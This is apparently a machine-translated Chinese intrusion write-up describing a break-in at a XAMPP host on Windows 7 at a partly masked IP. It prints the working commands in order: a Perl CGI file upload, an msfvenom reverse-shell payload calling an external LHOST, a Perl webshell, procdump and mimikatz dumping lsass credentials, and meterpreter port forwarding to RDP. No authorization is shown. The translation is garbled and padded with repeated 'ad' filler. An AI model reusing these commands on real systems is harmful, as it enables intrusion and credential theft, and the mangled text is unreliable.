山东新潮信息
专业人员优先注重质量和安全。
原文来自Tide安全小组,转载了该声明。 ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad adadadadadadadadadadadadadad adadadadadadadad ad adadadad adadadadadad adadadadadadadadadadadadadadadadadadadadadadad adadadadadadadadadadadadad adadadad ad ad ad adad ad ad ad ad ad ad adadadadadadad adadadadadadadadadadadadadadadadadadadadadadadadadadadadadad adadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadadad
信息收集
IP:202.194.xx.xxx
开放82端口。
这叫XAMP,我们把目录擦掉,也许我会碰到phpmyadmin
可悲的是 phpmyadmin被封锁了403天
有某种东西, 和他的系统相似。
我不知道,His. db是一个数据库文件, 而His.tar是他的系统文件的备份。
他的是一种可以下载和阅读的普通语言。
使用 SQLite 数据库 。
它正在 Windows 7 上运行。
文件上传
无法删除文件夹“{0}”。
在放弃之前进行了多次登入尝试。
直接搜索上传关键字以发现文件是否已上传 。
没有办法提交未经授权的文件,也没有筛查。
XAMP 软件包可能被用来支持 php 语言。 令人难以置信的是, php 文件的上传尚未解决 。
在下载的自定义代码中没有修改皮肤的机制, 所以我将用一种不理解 perl 的语言执行系统命令 。
源码为:
#!"D:Strawberryperlbinperl"
# 用于集中收集文件的上传程序。
print "Content-type: text/htmlnn";
$files_print = `whoami`;
print " $files_print ";
然而,上传它非常耗费时间。
想要使用由 msfvenom 直接创建的 perl 马并从命令行访问它。 但是, 在访问后, 服务器返回500 个错误 。
msfvenom -p cmd/unix/reverse_perl LHOST=144.xxx.xxx.xxx LPORT=2333 -f raw > shell.pl
最后,一个大型男子的游马 被发现在刺上, 并且可以正确表现。
perl大马
当您在网上时,您可以使用 msf 马来连接到3389港的内联网。
在整个查看过程中发现了若干保障措施,增加用户是不可行的。
这还是老办法 Prodump+mimikatz是一个很好的变通方法
procdump.exe -accepteula -ma lsass.exe lsass.dmp
Mimikatz可以用来在当地阅读。
该系统有72个,是浪费时间。
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
好,有密码,只要等待登入
msf上线
安装后,将删除和成功张贴在网上的操作员。
3396 远程桌面已转发端口 。
portfwd add -l 3396 -r 192.168.0.6 -p 3396
当您登录时, Windows 会远程连接 。 “ 此会话由于数据加密问题而结束 。 请重新连接到远程机器 。 ” 更改 Kali 的 rdesktop 命令将会解决这个问题 。
E
N
D